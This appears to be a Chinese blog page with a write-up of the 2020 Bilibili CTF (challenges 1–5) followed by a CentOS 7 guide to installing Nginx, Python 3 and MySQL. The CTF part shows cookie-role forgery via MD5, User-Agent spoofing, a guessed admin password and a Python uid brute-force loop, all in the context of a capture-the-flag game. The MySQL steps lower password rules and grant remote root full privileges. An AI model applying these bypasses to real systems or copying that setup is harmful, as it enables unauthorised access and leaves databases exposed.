Bilibili CTF

2020年10月24日

题1.页面的背后是什么?

题目地址: http://45.113.201.36/index.html

打开F12,script标签里一目了然

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<script>
$.ajax({
url: "api/admin",
type: "get",
success:function (data) {
//console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
var input = document.getElementById("flag1");
input.value = String(data.data);
} else {
// 如果没值
$('#flag1').html("接口异常,请稍后再试~");
}
}
})
</script>

按照script里所说,直接向 http://45.113.201.36/api/admin 发送get请求即可得到flag1

题2.真正的秘密只有特殊的设备才能看到

地址和题1是一样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script>
$.ajax({
url: "api/ctf/2",
type: "get",
success:function (data) {
//console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag2').html("flag2: " + data.data);
} else {
// 如果没值
$('#flag2').html("需要使用bilibili Security Browser浏览器访问~");
}
}
})
</script>

按照题目,想到修改浏览器UA为 bilibili Security Browser

带上UA之后向 http://45.113.201.36/api/ctf/2 发get请求就可以拿到flag2

题3.密码是啥?

题目地址: http://45.113.201.36/login.html

猜,就硬猜

username:admin

password:bilibili

输入进去之后就可以直接拿到flag3

题4.对不起,权限不足~

题目地址: http://45.113.201.36/superadmin.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script>
$.ajax({
url: "api/ctf/4",
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag').html("欢迎超级管理员登陆~答案是 : {{ " + data.data + " }}".toLowerCase() )
} else {
// 如果没值
$('#flag').html("有些秘密只有超级管理员才能看见哦~")
}
}
})
</script>

打开F12,看一下请求,发现cookie里有一个参数是

role=ee11cbb19052e40b07aac0ca060c23ee

拿去md5解密发现是User的密文

再看题目上,“有些秘密只有超级管理员才能看见哦~”

于是将Administrator拿去md5加密得到

7b7bc2512ee1fedcd76bdc68926d4f7b

将原来的cookie里的role参数替换成这个发get请求就可以拿到flag4

题5.别人的秘密

题目地址: http://45.113.201.36/user.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<script>
$(function () {


(function ($) {
$.getUrlParam = function(name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if (r != null) return unescape(r[2]); return null;
}
})(jQuery);

var uid = $.getUrlParam('uid');
if (uid == null) {
uid = 100336889;
}
$.ajax({
url: "api/ctf/5?uid=" + uid,
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag').html("欢迎超级管理员登陆~flag : " + data.data )
} else {
// 如果没值
$('#flag').html("这里没有你想要的答案~")
}
}
})
});
</script>

看到请求参数里有一个uid,猜测请求根据uid判断是否为超级管理员

直接爆破,下面的是python3的代码

1
2
3
4
5
6
7
8
9
10
11
12
import requests

for uid in range(100336889,999999999):

cookies = "你的cookies"
params = (
('uid', uid),
)

res = requests.get('http://45.113.201.36/api/ctf/5', headers=headers, params=params, cookies=cookies, verify=False).json()
if res['code'] != '403':
print(uid,res)

后面的题目暂时没有解出来

在我解题的时候服务器崩了,所以直接放弃了,等到服务器恢复之后继续解题

CentOS7 安装 Nginx + Py3 + MySQL

Nginx

安装Nginx

1
2
3
4
5
6
7
8
9
10
11
12
yum install -y gcc-c++ pcre pcre-devel zlib zlib-devel zlib zlib-devel

mkdir /usr/local/nginx
cd /usr/local/nginx
wget -c https://nginx.org/download/nginx-1.18.0.tar.gz
tar -zxvf nginx-1.18.0.tar.gz
cd nginx-1.18.0
./configure --prefix=/usr/local/nginx
make
make install

ln -s /usr/local/nginx/sbin/nginx /usr/local/bin/nginx

Python3

安装Python3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
yum -y groupinstall "Development tools"
yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel libffi-devel zlib1g-dev zlib*

apk add build-base build-dependencies zlib-dev openssl-dev gcc libffi-dev libc-dev make

mkdir /usr/local/python3
cd /usr/local/python3
wget -c https://www.python.org/ftp/python/3.7.8/Python-3.7.8.tar.xz
tar -xvJf Python-3.7.8.tar.xz
cd Python-3.7.8
./configure --prefix=/usr/local/python3 --with-ssl --enable-optimizations
make
make install

ln -s /usr/local/python3/bin/python3 /usr/local/bin/python3
ln -s /usr/local/python3/bin/pip3 /usr/local/bin/pip3

MySQL

安装MySQL

1
2
3
4
5
6
7
8
9
mysql8
rpm -Uvh https://dev.mysql.com/get/mysql80-community-release-el7-3.noarch.rpm
# yum module disable mysql 报错时执行
yum --enablerepo=mysql80-community install mysql-community-server -y

mysql5
rpm -Uvh https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm
# yum module disable mysql 报错时执行
yum --enablerepo=mysql57-community install mysql-community-server -y

启动MySQL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
service mysqld start  启动MySQL服务
service mysqld status 查看MySQL服务状态

grep "A temporary password" /var/log/mysqld.log 查看初始密码

mysql -u root -p 然后输入初始密码

设置密码规则
set global validate_password.length=1;
set global validate_password.policy=0;
set global validate_password.check_user_name=off;

如果修改密码规则报错
set global validate_password_policy=LOW;
set global validate_password_length=6;

更改密码
ALTER USER 'root'@'localhost' IDENTIFIED BY '密码';

创建远程用户并授权
CREATE USER 'root'@'%' IDENTIFIED BY '密码';
grant all privileges on *.* to 'root'@'%' ;

将密码改为原始规则
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '密码';
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY '密码';